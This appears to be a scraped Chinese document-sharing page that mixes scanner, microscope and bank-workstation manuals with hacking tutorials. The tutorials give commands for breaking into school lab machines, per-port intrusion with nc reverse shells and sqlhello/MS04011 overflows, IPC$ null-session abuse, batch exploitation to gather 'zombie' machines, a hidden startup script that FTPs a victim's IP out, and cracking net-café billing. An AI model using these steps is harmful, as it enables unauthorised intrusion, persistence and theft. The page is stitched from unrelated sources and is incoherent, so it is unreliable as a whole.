MS04011扫描工具文章说明

TWAIN 扫描指南 Microsoft Windows 用户指南 Xerox W110 W13

XEROX®在美国和/或其他国家/地区的注册商标，其使用需经 Xerox Corporation许可。

Visioneer 已得到 Xerox® 的商标许可。

Visioneer 品牌名和 OneTouch® 徽标是Visioneer, Inc. 的注册商标。

未经书面许可，不得复制、改编或翻译，除非版权法允许。

所声明的版权保护包括各种内容的受版权保护的材料和信息，这些材料和信息现在被法规或司法所允许或在本文中得到许可，包括但不限于从屏幕上所显示的软件程序中生成的材料，如样式、模板、图标、屏幕显示、外观等。

TWAIN™ 是 TWAIN Working Group在美国的注册商标。

Adobe®、Adobe® Acrobat®、Adobe® Reader® 以及 Adobe® PDF 徽标是 Adobe Systems Incorporated 在美国和/或其他国家的注册商标。

Microsoft 是 Microsoft Corporation 在美国的注册商标。

Windows™ 和 SharePoint® 是Microsoft Corporation 的注册商标。

此处提及的所有其他产品可能是其所属公司的商标，特此说明。

本文档定期更改。

变更、技术精确性错误以及印刷错误将在后续版本中得到修正。

信息可随时更改，恕不另行通知，不代表 Visioneer 方作出的承诺。

突破本机XP系统权限

学校举行国家信息中心举办考试，占用学校机房的机器，以前我们用的机器是WIN2000PRO 的系统，而且是管理员权限。

可是现在变成了双系统，WIN2000OPRO 和WINXP。

而且WIN2000的给的权限是user，不爽，但是系统居然连个SP1补丁也没有打，所以轻松用输入法漏洞搞定系统了。

可是XP的系统居然连个user用户也不给，我又想用一下XP ，可是有不能和老师要密码，否则就?…可是自己来搞定XP ，也不是说说就可以搞定的，我行动的步骤如下：首先分析一下双系统的分布情况，WIN2000的系统安装在了C盘下。

而XP的系统安装在了E盘下，两个分区都是NTFS。

而且E盘下还没有给2000下的user用户任何访问权限。

思路：1、试验administrator的密码是不是空，连按两次CTRL+AL T+DEL ，会弹出登陆的界面。

2、在突破2000系统的权限，然后给自己加权限来访问XP所在的盘符E盘。

3、或者把SAM文件删除掉，这样administrator的用户密码就变成了空了。

4、把XP系统下的系统文件logon.scr用cmd.exe替换掉。

5、用我手头现有的漏洞溢出工具MS04011来溢出获得权限。

6、替换系统现有的服务文件，而被替换的文件和替换的文件（这个我自己做一个批处理，添加帐户和提升为管理员，然后把后缀改为.exe就可以了），可是被替换的系统服务是什么文件，我对XP不熟悉，还不知道替换那个服务的启动文件呢思路有了，那就开始做：第一次尝试：正常启动XP，试验第1种思路，看看可以行的通不，这个只是尝试，没有多打希望，可是还真的是这样的。

当启动到登陆界面的时候，我按了CTRL+ALT+DEL连续两次，结果以administrator的用户，密码是空登陆，失败。

看来管理员没有用默认Administrator用户的空密码，改掉了。

没关系，还有第2种思路。

第二次简单突破：首先到2000的系统，然后突破权限使自己成为管理员，到E盘下，删除了e/windows/system32/config下的SAM文件。

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法（入侵菜鸟必看）1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破（字典是关键）最后SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功）sqlhelloz.exe 入侵ip 1433 （这个是正向连接）2. 4899端口入侵用4899过滤器.exe，扫描空口令的机器3. 3899的入侵对很早的机器，可以试试3389的溢出(win3389ex.exe)对2000的机器，可以试试字典暴破。

(tscrack.exe)4. 80入侵对sp3以前的机器，可以用webdav入侵；对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）可以利用SQL进行注入。

（小榕的注入软件）。

5. serv-u入侵(21端口）对5. 004及以下系统，可用溢出入侵。

（serv5004.exe）对5.1.0.0及以下系统，可用本地提升权限。

（servlocal.exe）======================================对serv-u的MD5加密密码，可以用字典暴破。

（crack.vbs）输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。

如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。

7. 6129端口用DameWare6129.exe入侵。

8. 系统漏洞利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，进行溢出入侵。

9. 3127等端口可以利用doom病毒开的端口，用nodoom.exe入侵。

扫描器说明书

掃描器使用手冊目錄使用控制面板上的掃描按鍵 (3)掃描器硬體按鍵設定 (3)SCAN 掃描鍵 (5)COPY 影印鍵 (5)FAX 傳真鍵 (6)E-MAIL 電子郵件鍵 (7)掃描器軟體面板 (8)軟體面板設定 (8)掃描 (9)影印 (10)傳真 (11)電子郵件 (12)OCR文字辨識 (12)個性化功能 (12)附屬軟體連結 (14)其他設定 (15)擷取TWAIN對話框 (16)使用TWAIN對話框 (17)使用控制面板上的掃描按鍵請確認是否已開啟直接掃描直接掃描直接掃描的功能（顯示在 Windows ® 工作列右下角的位置）。

若您未開啟直接掃描的功能，請依照下列步驟將它開啟：：1.點選工作列的「開始」「開始」。

2.選擇「程式集」「程式集」「程式集」後再選擇B e a r P a w 。

3.按一下「直接掃描」。

掃描器硬體按鍵設定在直接掃描的圖示上按一下右鍵會出現下方的選單：點選掃描器設定掃描器設定掃描器設定後會出現以下的對話框，您可以在此對話框中更改掃描器的各項預設值。

本掃描器配備多樣功能先進的直接控制按鍵，您只要運用手指輕觸，即可快速使用掃描器的各項功能。

直接掃描掃描器設定對話框掃描器的出廠設定值音效控制鍵按下此鍵即可開啟或關閉BearPaw 面板的音效功能。

SCAN 掃描鍵欲使用掃描鍵掃描文件，請如下列方式操作：1.將您要掃描的文件或圖像正面朝下，輕貼在掃描器的玻璃面板上。

掃描鍵，掃描器即開始進行掃描，2.按下掃描鍵掃描鍵掃描時螢幕上會出現工作進度顯示，告訴您目前掃描工作完成度，當掃描結束，系統會自動開啟Photo Express TM將您剛剛所掃描的圖像載入。

COPY 影印鍵欲使用影印鍵複製文件，請如下列方式操作：1.將您要掃描的文件或圖像正面朝下，輕貼在掃描器的玻璃面板上。

影印鍵，掃描器即開始進行掃描，2.按下影印鍵影印鍵掃描時螢幕上會出現工作進度顯示，告訴您目前掃描工作完成度，當掃描結束，系統會自動將您剛剛所掃描的圖像從印表機輸出。

各个端口的入侵

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊.
5. C:/>net time //127.0.0.1
再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备
开始下面的命令。
6. C:/>telnet 127.0.0.1 99
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，不过我们使
用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们能Telnet上去了，不过SRV是一次性的，下次登录还要再激活！所以我们打
算建立一个Telnet服务！这就要用到npy ntlm.exe $">//127.0.0.1/admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
8. C:/WINNT/system32>ntlm
经典IPC$入侵
1. C:/>net use $">//127.0.0.1/IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators，密码为"空"的IP地址(气好到家如果是打算攻击的话，就能用这样的命令来和127.0.0.1建立一个连
11. C:/>net user guest 1234

开启＼关闭计算机端口

开启＼关闭计算机端口2008-03-21 14:37１.开启电脑端口通过关闭端口可以做到防止病毒入侵和禁止登陆某些软件的功能,如QQ和BT 对于个人用户来说，您可以限制所有的端口，因为您根本不必让您的机器对外提供任何服务；而对于对外提供网络服务的服务器，我们需把必须利用的端口（比如WWW端口80、FTP端口21、邮件服务端口25、110等）开放，其他的端口则全部关闭。

这里，对于采用Windows 2000或者Windows XP的用户来说，不需要安装任何其他软件，可以利用“TCP/IP筛选”功能限制服务器的端口。

具体设置如下：1.通用篇（适用系统Win2000/XP/server2003），最近我在论坛看了一些文章，发现大家都有一个误区，就是哪个端口出漏洞就关闭哪个端口，其实这样是不能保证系统安全的，正确的方法应该是先了解清楚自己需要开放哪些端口，了解完毕后，把自己不需要的端口统统关闭掉，这样才能保证系统的安全性。

比如说你的电脑是一台服务器，服务器需要有Mail Server和WEB服务，还要有FTP服务，这些只需要开放21、25、80、110就足够了。

其它的就应该全部关闭。

关闭的方法：点击“开始→控制面板→网络连接→本地连接→右键→属性”，然后选择“Internet(tcp/ip)”→“属性”，。

在“Internet(tcp/ip)属性”对话框中选择“高级”选项卡。

在“高级TCP/IP设置”对话框中点选“选项”→“TCP/IP筛选”→“属性”，。

在这里分为3项，分别是TCP、UDP、IP协议。

假设我的系统只想开放21、80、25、110这4个端口，只要在“TCP端口”上勾选“只允许”然后点击“添加”依次把这些端口添加到里面，然后确定。

注意：修改完以后系统会提示重新启动，这样设置才会生效。

这样，系统重新启动以后只会开放刚才你所选的那些端口，其它端口都不会开放。

2.利用系统自带防火墙关闭端口（适用系统WinXP/Server 2003）微软推出WinXP之后的操作系统本身都自带防火墙，用它就可以关闭掉不需要的端口，实现的步骤也很简单。

条码扫描器：如何使用扫描仪扫描图片

扫描仪地使用须知、扫描前地准备普通用户在使用扫描仪之前，应对搞明扫描仪地基本原理和使用说明书.把扫描仪应尽量放在平坦、稳定地地方，扫描前仔细检查玻璃上方是否有污渍，以免影响扫描效果.用户第一次使用扫描仪前，一定要先开锁，且保证电源开关置于“”，才能插入电源插头，因为在运输中扫描镜头前后撞击会损坏，所以厂商在扫描仪上都安装有一个锁定装置(机械装置或电子装置)，专门用于锁定扫描仪地镜头组件，确保其不被随意移动.文档收集自网络，仅用于个人学习、预热扫描仪扫描前先打开扫描仪预热至分钟，使机器内地灯管达到均匀发光状态，确保光线平均照到稿件每一处.．原稿放置地要求因扫描仪地局限，扫描得到地图像或多或少会出现失真或变形.一定要尽量使用品质出色地原稿扫描，这是得到高质量图片地关键；对一些尺寸较小地稿件，应尽量放置在扫描仪中央，尽量减少变形.原稿放置时使扫描对象地一个角对齐扫描仪上地指示箭头，正面向下放平，对于以反射方式扫描地对象，放置不平会使扫描结果不良，并且对文件地后期处理增加难度. 一般地扫描均应将顶盖合上，但当扫描较厚地对象时，只能采取开盖式，此时要注意以适当地力量压紧对象，并通过预扫调整扫描效果，尽量减少漏光空间.文档收集自网络，仅用于个人学习、预扫步骤不可少预扫功能是非常必要地，它能保证扫描效果.通过预扫后我们可以直接确定自已所需要扫描地图像区域，以减少扫描后对图像地处理工序；另外可通过观察预扫后地图像，依据图像地色彩、效果等对扫描参数重新进行设定、调整之后再进行扫描.预扫对较大地图片，可使用较小地分辨率，对较小地图片，则应该采用高分辨率以获得最佳地效果.文档收集自网络，仅用于个人学习、确定使用多大地分辨率使用多大地分辨率由用户地实际应用需求决定.分辨率越高意味着可以获得更多地图像细节，更清晰地效果，同时也意味着扫描得到地图像文件增大而且不易处理.一般来说，网页图片分辨率通常在左右；印刷出版图片，需要用到以上地分辨率，使用则更佳；如果想将扫描后地作品通过打印机打印出来，则必须综合考虑打印机地分辨率才能决定.对于用于打印用途地彩色图像，用户在设定扫描分辨率时只需将打印机地真实打印分辨率除以或即可.如以分辨率为地打印机为例，扫描分辨率可设定为至之间.但到底是还是呢？用户分别以这两个分辨率用扫描仪进行扫描，然后将打印出来地效果进行比较.如果用户看不出两张图像地差别，表示对该台打印机已经足够，用户甚至可用更低地扫描分辨率（如）再进行一次扫描，如仍看不出差别，表示已足够.若低地分辨率可看出差别，则表示为最佳分辨率.依此类推，如果用户找到了最适当地扫描分辨率，将来凡是要使用该台打印机打印扫描图像时，扫描分辨率都应以此为准.文档收集自网络，仅用于个人学习扫描参数中实际上除了分辨率外，缩放比例也是十分重要地，但多数使用者并不了解它地重要性.原稿面积为×英寸，如果用户希望以×英寸进行打印，这时应该如何设定扫描图像地分辨率呢？用户首先应该根据打印机地分辨率，将扫描仪地分辨率设定为，然后决定缩放比例.×英寸地扫描原稿若想放大为×英寸，用户应以目标尺寸除以原稿尺寸，宽：，高，正确地缩放比例应设定为.当长宽地缩放比例不同时，用户应取较小数值. 文档收集自网络，仅用于个人学习选择正确地图像类型.如果图像是单色地原图像，请选用线条图像进行扫描..对于黑白照片，用灰度图像类型进行扫描从而得到较小地图像文件..如果希望用黑白打印机输出彩色图像，也请用灰度图像类型进行扫描.．进行扫描做好上述工作后，从扫描仪地相关软件中选择“扫描到应用程序”，也可以直接从图像处理软件软件地“从扫描仪获得文件”选项中调用扫描仪扫描图像. 文档收集自网络，仅用于个人学习.除去网纹扫描仪在扫描印刷照片时，会将印刷物上地细微墨点扫描进来，影响图像地质量.使用去网技术可以通过对有网点地图像进行分析，将其还原成没有网点地原稿，重现原图片地效果.扫描仪一般都有几个选项供我们选择.当原图是杂志或覆膜印刷品时，请选择“杂志”；当原图是报纸或较粗糙地网点印刷品时，请选择“报纸”；当原图是高品质地精美印刷品、网点非常小时，请选择“艺术印刷品”.需要说明地是，如果扫描非印刷品，要选择“不设定”，不要将这个功能打开，因为这样会降低扫描图像地质量.文档收集自网络，仅用于个人学习.将较大地图分几次扫描后拼接如果扫描仪地幅面比较小，不能将需要扫描地器件一次扫描完，那就分成多次扫描.先用待扫描地器件在扫描仪上横竖测量一下，看是横扫还是竖扫好. 、擅用校色工具在对彩色图像进行扫描时，使用类似于这样地扫描软件对扫描出来地照片之色彩进行校正，可以得到更为准确地图像色彩.文档收集自网络，仅用于个人学习想知道更多扫描仪专业知识，请时刻关注东莞立象条码扫描器网站查看其最新网站动态！。

CNCERTCC关于僵尸网络应对措施

• Bot支持的命令集
主要功能，包括认证、升级和自删除类的命令，比如！ login、.update、.download、.uninstall等。
僵尸网络的处置
一、擒贼先擒王——模拟控制者，对僵尸网络进行完全控制
最终解决办法：直接找到控制服务器，需要授权或用户配合： • 方法1：发送更新命令(吃毒丸) ； • 方法2：发送自删除命令 (集体自杀)； • 条件：掌握控制者身份认证信息
0 8月19日 8月21日 8月23日 8月25日 8月27日 8月29日 8月31日 9月2日 9月4日 9月6日 9月8日 9月10日 9月12日 9月14日 9月16日 9月18日
客户端数量
发现了控制黑客的线索(2019年8月29日)
发现一昵称为gunit的用户曾经登陆该网络并向多个频道发送控制命令，命令为扫描某种漏洞。如下。红色部分和样本的活动吻合。
僵尸网络的处置
知己知彼： • 控制服务器信息：
域名或IP、端口（port）、连接密码 (如果有)；
• 频道信息:
频道名（channel）、频道密码(如有)；
• 控制密码、编码规则和Host
控制者发送密码到频道中，用于标识身份，常以.login pass的形式出现。编码规则和是否启用host认证是bot程序实现的，不体现在网络通信中。
二、釜底抽薪——切断用户主机和控制服务器的联系：
• 方法1：网络边界上阻断C&C通信条件：掌握控制服务器的准确信息 • 方法2：取消域名，无法解析;条件：得到授权
三、攘外必先安内——清除用户终端上的Bot程序，打补丁：
• 手工查杀 • 专杀工具或升级杀毒程序问题：如何发现BOT?
三、CNCERT/CC的工作

通用批量溢出利用工具CMD版commover.exe

但是后来04011的时候利用scanner和exp得一个一个的来，所以就想起来了要弄一个批量的
偷懒嘛
哈哈
你们学校女生的电脑都开SQL吗……？顶部 sunlion 发布于:2005-11-2716:31 [5楼]
TO：sunwear
我们学校的有软件学院和计算机学院的，还有那些研究生的女生(一般与计算机相关专业的他们都得学数据库这门课，自然少不了作业，装SQL也不足为奇了哦，哈哈！)，多的是！哈哈，不过研究生的MM太老了，不好玩，哈哈！
写给菜鸟：
这个东西我认为用来扩大自己的肉鸡是非常有用的，比如我通过SQL的hello溢出得到
192.168.111.23的一台肉鸡，那么我们就可以通过其他的漏洞开对其内网进行攻击，
比如MS04011，我们可以先利用rootshell写的那个scanner对其内网进行扫描，得到结果lsass.txt
下载下来编辑去掉后面无用的信息，在传上去，然后把MS04011.EXE传到肉鸡上面，在利用这个commover.exe进行攻击，相信你会得到很意外的收获，哈哈！
[此贴被sunlion在2005-11-2607:44重新编辑]
描述：通用批量溢出利用工具CMD版commover
附件：commover.rar(16K)下载次数:260顶部 eviloctal 发布于:2005-11-2600:49 [1楼]
head------EXP的前缀-----保存攻击IP的文件的全名(.txt)
after------EXP的后缀参数(多个参数需要用双引号刮起来)
exp------exp的文件全名(.exe)
有前缀参数:comover0file.txt"1234192.168.0.253"ms04011.exe

明鉴WEB应用弱点扫描器用户手册

4.1.6. 表单配置.........................................................................................................16
4.1.7. Web 检测配置.................................................................................................17 4.1.8. 扫描策略配置.................................................................................................19 4.2. 系统配置管理.............................................................................................................20
4.8.3. XSS .................................................................................................................32 4.8.4. 表单隐藏域.....................................................................................................32
4.6. SSL 转发器.................................................................................................................29

纯脚本套牢你的动态ip肉鸡教程

这样的话，所要执行的文件就写出来了，现在的问题是如何将执行文件的整个过程变的隐蔽，开始我想的是将这个批处理文件写到启动栏里，但是启动的时候黑黑的界面太危险，而且有循环的，人家不怀疑才怪呢!更糟的是不小心还会遗失自己的ftp密码。经过一段时间的搜索发现将脚本写入到组策略的启动脚本里就没有任何提示了!而且启动脚本比较隐蔽，一般个人用户都不会注意到这个地方，并且也很容易实现。我们分析启动脚本的配置文件C:\WINNT\system32 \GroupPolicy\Machine\Scripts\scripts.ini，注意这个文件当配置启动脚本时才会出现，并且有系统隐藏属性。文件如下：
ipconfig >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
time /t >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
date /t >C:\WINNT\system32\config\config.txt
ftp -n -s:"c:\WINNT\system32\system.ftp"
exit
:end
ping |find "Reply from"
废话不多说了，我们就一起来看看如何用脚本栓住肉鸡吧!首先，我们知道因为我们的肉鸡很特殊，不是长时间在线，我们不过是因为一些特别的原因而想要长期控制他，但是因为安全的原因不想用木马。我们的问题是肉鸡上线后如何在想得到他的ip的时候可以快速得到他的ip，(假设你已经开启了肉鸡的telnet或者其他的后门，只要知道ip就可以登陆)。这里，我用的方法是ftp，我也曾经想过用http的方法，但是实现的难度大点就不考虑了。这里，首先看这几个命令:

S扫描器教程

S扫描器教程
s扫描器是一款命令行下高速扫描利器
命令: s.exe syn ip1 ip2 端口号 /save
s.exe tcp ip1 ip2 端口号线程数 /save
s.exe不可以在xp sp2下使用!那谁有xp sp2专版的!当然的使用syn代替TCP可以是可以但太慢了
哪种模式进行扫描。
2.SYN扫描不需要线程那个参数，请看上面例子5和6
3.TCP扫描的最大并发线程不能超过1024.
4.使用SYN模式扫描，不能扫描Banner,具体为什么不能，请查看有关SYN的资料
5.内网用户的朋友可以用tcp扫描
关于S.exe 的用法和错误解释
S扫描器扫描命令是:
TCP扫描218.80.12.1到218.80.12.123这IP段中的21和5631端口,最大并发线程是512,并显示Banner
例子三：
S TCP 218.80.12.1 218.80.12.12 1-200 512
TCP扫描218.80.12.1到218.80.12.12这IP段中的1到200端口,最大并发线程是512
扫描结束后Result.txt就存放在你的S扫描器所在的目录里。刚才扫描的东西都在里面。
例子六：
S SYN 218.80.12.1 218.80.12.255 21 /Save
SYN扫描218.80.12.1到218.80.12.255这IP段中的21端口,将结果写入Result.txt
这是昨天一个“黑暗中的矩阵”扫描的IP段，也就是做刷Q币动画的。
有很多人不能用，为什么呢？
第一、你的S.exe没有放在你在运行的目录下，所以会提示：
''s'' 不是内部或外部命令，也不是可运行的程序或批处理文件。

hacker工具大全

入侵助手1.0
该工具可以将dos下的入侵命令直接生成给黑客!下载
Snake的代理跳板
让机器成为sock5代理软件的程序,可以用它隐藏自己的ip.下载
Fport.exe
命令行下查看系统进程与端口关联!下载
IEcookiesView
COOKIES欺骗、修改工具!在得到MD5密码后,利用该工具做coolies欺骗最好不过下载
小哨兵密码清除,没有测试过,大家试试!下载
解锁安全器2.0
解锁安全器2.0!下载
硬盘还原卡破解程序
硬盘还原卡破解程序! 下载
还原卡解锁
还原卡解锁!下载
Bios密码探测器
Bios密码探测器,速度很快的哦!下载
共享密码扫描器
共享密码扫描器,也是一个不错的工具!下载
自贡学生联盟出的sql注射工具,跟臭要饭的哪个差不多!下载
绝世猜解SQL注射 1.0
BUGKIDZ臭要饭的!以前编写的sql注射工具,使用率相当广泛!简单实用的工具下载
五、网吧工具
还原转存大师
藏鲸阁出的还原转存大师,大家都认识!不做介绍!下载
还原精灵清除器
CY07工作室出的一个还原精灵清除器!好久以前我用过,感觉非常不错!下载
想成为真正的黑客高手,那就先学会使用该工具吧!下载
WinSock Expert
非常实用的一个抓包工具,也是黑客经常使用的工具!该版本为英文原版!下载
WinSock Expert汉化版
有名的抓包工具!WinSock Expert v0.6beta1草哲汉化版下载
虚拟主机站点查询工具
藏鲸阁陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦!下载

MS-040微镜说明书

• Cleaning: — For microscope body, unplug power and use a soft slightly damp cloth to clean dust or dirt. — For optical surfaces, such as the eyepiece lens or objective lens, use a slightly damp microfiber cloth or Carson’s Lens Cleaners to gently remove dust or debris.
• When not in use, it is best to store your microscope in original container. • When moving the microscope, hold by the metal neck or base of the microscope body.
Eyepiece
10x 10x 10x
Objective Lens
4x 10x 40x
Total Magni cation
40x 100x 400x
9. Magnification: i. To change magni cation, rotate the objective lens turret so that the desired objective lens is perpendicular to the stage. Refocus as needed.
3. Gently place the narrow end of the eyepiece into the draw tube. 4. Rotate the objective lens turret so that the first objective lens (4x labeled by a red line) is perpendicular to the stage. 5. Position your desired specimen on the stage, with your area of interest located in the center of the stage. 6. Use the stage clips to securely hold down your slide or specimen.

3、扫描工作站使用手册1

ICBC SDC
扫描工作站使用说明
2005-11-11
1
ICBC SDC
内容提要
课程目标总体介绍登录扫描工作站设置扫描工作站扫描图像的显示和处理补录
2005-11-11
2
ICBC SDC
课程目标
• 课程目标
• 掌握扫描工作站的使用
2005-11-11
3
ICBC SDC
总体介绍
课程目标总体介绍登录扫描工作站设置扫描工作站扫描图像的显示和处理补录
2005-11-11
23
ICBC SDC
影像扫描－新建批次
• 新建批次
• 功能描述：为影像扫描产生一个新的批次号。 • 操作描述：选择好应用号（在生成批次号之后应用号不允许被改变），点击“新建批次”按钮，将会根据应用号获取新的批次号。在新的批次建立好之后就可以点击“开始扫描”进行影像的录入。
课程目标总体介绍登录扫描工作站设置扫描工作站扫描图像的显示和处理补录
2005-11-11
39
ICBC SDC
图像补录
• 影像补录
• 功能描述：对质检不通过需要补录的批次进行影像的插入、替换或者删除等操作 • 操作描述：点击主控台中“补录”按钮（或菜单：操作—补录），进入补录界面，如下图:
2005-11-11 36
ICBC SDC
图像的显示和处理－图像处理
也可双击图像进行放大显示，并进行相应处理，见下图：
2005-11-11
37
ICBC SDC
图像的显示和处理－图像处理
注意这里的图像处理并不实际对图像文件进行改变，只是为了查看方便。
2005-11-11

网吧破解2004

004有效)2007-05-02 12:59下面给大家讲怎么才能免费在网吧上网，前提条件是网吧管理软件必须是万象2004。好了，现在开始。以前我看过别人做的免费上网教程，破解万象2004。在桌面上的网上邻居点后键→属性→本地连接→属性，把NWLink IPX/SPX/NetBIOS Compatible Transpor前面的勾去掉，然后确定。就可以实现免费上网了。但是现在很多网管发现了这个BUG，怎么办呢？一样的可以实现。一般网吧发现这个漏洞过后一般都是把本地连接的属性去掉了。现在教大家怎么来开启本地连接属性。好废话少说，我们开始。首先我们来看看我的电脑现在的本地连接可不可以用。。。。。。。。。。看到了吧，本地连接的属性不可用。现在转入正题。开始在开始→运行输入gpedit.msc 打开组策略，在管理模版→网络→网络连接然后点右边的《为管理员启用windows 2000网络连接设置》后键属性点已禁用然后应用确定。现在再打开本地连接看看本地连接的属性可以用了？还是照上面那样把《NWLink IPX/SPX/NetBIOS Compatible Transpor》前面的勾去掉。然后确定。网吧入侵首先要从扫描开始！` 我用的是“超级网络邻居破解版” 我个人爱好用的它！！~看你自己用什么扫描工具！~ 首先我们要找到收费的住机！~看我操作！`扫描中！有经验的朋友一眼就能看出收费的住机是哪台！~ 先看工作组，我这有5台有点怪！~就是SERVER工作组的！`和192.168.0.158 还有就是192.168.0.201一般情况下面的主机和收费机是在一个工作组的！` 一看就知道HZMOV是电影服务器！~ 再看GAME-SERVER就知道是游戏服务器！` 一般收费的住机不可能在电影服务器和游戏服务器上！~所以就只剩下192.168.0.158 不好意思192.168.0.201没扫到~大概是没有开！~ 呵呵！`其实192.168.0.201 是客户机的1号机！~ 因为192.168.0.1的IP被网关占用了所以他开的IP是192.168.0.201！比较可疑的就是192.168.0.158 好我们来试一试它！~不好意思找工具！`扫描就完了！~ ==接着来`不好意思本人打字慢！~所以请快进~ 我就不说漏洞的形成了！直接演示工具的用法！~ 我用到的remoxec！~它主要是RPC漏洞的利用工具！~ COMPUTER填入侵的机子的IP这里填：192.168.0.158 ACCOUNT填入侵的机子的用户名：这里我们填：ADMINISTERATOR PASSWORD填入侵的机子的密码！这里我们不知道密码呵呵！~不过一般网吧是自动登陆的话！我们不填就行了 ~ COMMAND就是你要在入侵的机子上运行的命令！~ 然后我们看它如果返回了一个PID值就表示运行成功！~ 我们这里直接把主机的D盘共享出来填命令：net share d$=d: 不好意思我这的网吧没漏洞啊！~ 因为是我把漏洞填补上的！呵呵！`网吧是我维护的！~呵呵还有就是用溢出我用的是MS04011 还有MS04011我就不说了工具包里很清楚的大家先拿出DSScan,这是一款针对该漏洞而编写出来的扫描器,打开后会看到很多选项,大家不用管它,保持默认就可以了,然后在Start IP和End IP里填上要扫描的起始地址,然后按一下旁边的"->"符号键,接着就可以开始扫描了.DSScan扫描速度非常快,一台也没有我打了补丁的所以没有！~呵呵！~ 接着在CMD里进入到存放ms04011.exe和getos.exe目录下,这里简单说明一下getos.exe的作用, 它是一个用来猜测对方主机是2000或XP系统的命令,使用非常简单,只要在命令后加上这里我们不用他的getos.exe，用其他的扫描工具！就可以很轻松的知道是什么系统！我们跳过~！主机IP就可以了,但在实际运用中,笔者发现另一个问题可能会误导菜鸟,且看下图,图2是笔者用自己电脑做的实验,由图可以知道,命令返回的判断结果是WINDOWS 2000 LAN Manager 和 windows 5.1,毕竟笔者也是初学者,以菜鸟的角度来思考,看到返回的结果是WINDOWS 2000 LAN Manager肯定大多数菜鸟门会判断对方主机就是WINDOWS 2000.这样就错了,笔者用的操作系统其实是WINDOWS XP,通过几次入侵后的比较,笔者发现windows 5.0的是win 2000系统的主机,而windows 5.1的则都是XP系统的主机.:) 不好意思啊！` 我关了CMD！！==我开！~ 至于ms04011.exe的用法也是很简单的,直接键入该命令按回车就能看到命令的详细使用方法,如果漏洞主机的系统是WIN 2K的话,就以ms04011 0 ip port的格式对漏洞主机会进我这里主机是2000的！所以我键入！我打了补丁所以没有成功！不好意思！刚才！`没有键入port 如果成功的话！~就在开一个CMD 然后键入：telnet 192.168.0.158 1987 1987是端口！刚才溢出成功的！你连上就可以干你要干的事了！~好了行溢出了,其中port是自己随便填的,它是你溢出成功后要TELNET的端口.还有一样要提的就是在命令的使用帮助里port的后面还写着一项叫ConnectBackIP的参数,这个可以不用上的,笔者猜它的作用大概是反向连接.因为笔者机子是在内网里的, 所以无法进行测试了.如果对方的系统是XP的话只要把ms04011后面跟的0改成1就行了,因为漏洞只存在于这两种系统的主机里,所以说只要直接用ms04011命令来对未知系统的主机进行两次溢出也是非常方便的,这就免去了用getos来判断对方系统这一步.(如果大家也觉得ms04011这个命令太长的话也可以学笔者这样直接把它重命名为ms.exe的.) 说了这么多,相信大家都郁闷了,图3是笔者成功溢出后telnet进漏洞主机预先设定的3344端口的截图,结果很简单,没什么可以再描述的了,值得注意的是用ms04011溢出的时候,如果成功发送 shellcode的话,ms04011是处于监听状态的,即cmd会停留在"shellcode size 404"这一行,只有在你另外打开一个CMD TELNET对方溢出设定的端口时,ms04011才会出现"Ret value = xxx"并返回根目录,这跟使用nc时很象.如果你输入的ms04011命令后立刻就返回到根目录而没有进入监听状态的话, 可以换一个端口再试.